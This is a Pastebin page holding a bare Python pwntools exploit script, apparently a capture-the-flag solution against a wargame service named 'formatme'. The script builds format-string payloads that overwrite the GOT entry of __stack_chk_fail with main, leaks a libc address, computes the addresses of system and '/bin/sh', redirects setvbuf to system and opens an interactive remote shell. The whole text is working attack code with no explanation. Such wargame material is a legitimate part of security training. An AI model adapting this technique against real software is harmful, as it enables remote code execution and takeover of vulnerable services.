Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- import time
- context(arch = 'i386', os = 'linux')
- def write2mem(r,addr_value,offset,prefix="",suffix="",sub=0):
- d = []
- for addr,value in addr_value:
- d.append((value>>16,addr+2))
- d.append((value&0xffff,addr))
- d.sort()
- payload=""
- address = ""
- v = 0
- for value,addr in d:
- value = value-len(d)*4-sub
- if value==v:
- payload+="%{}$hn".format(str(offset))
- else:
- payload+="%{}x%{}$hn".format(str(value-v),str(offset))
- v = value
- address+=p32(addr)
- offset+=1
- payload = prefix+address+payload+suffix
- return payload
- def exploit():
- __stack_chk_fail_GOT = 0x0804A014
- main = 0x0804851B
- setvbuf = 0x0804A020
- stdin = 0x0804A040
- HOST = 'formatme.wargame.whitehat.vn'
- PORT = 1337
- r = remote(HOST, PORT)
- offset = 7
- r.recvuntil("echo ")
- payload = write2mem(r,[(__stack_chk_fail_GOT,main)],offset,"","%20$p%19$p")
- r.sendline(payload)
- leak = r.recvuntil("echo ")[-5-len("0xf7538637"):-5]
- __libc_start_main = int(leak,16)-247
- offset_system = 141408
- offset_str_bin_sh = 1323755
- system = __libc_start_main + offset_system
- str_bin_sh = __libc_start_main + offset_str_bin_sh
- payload = write2mem(r,[(setvbuf,system),(stdin,str_bin_sh)],offset,"","")
- r.sendline(payload)
- r.interactive()
- exploit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement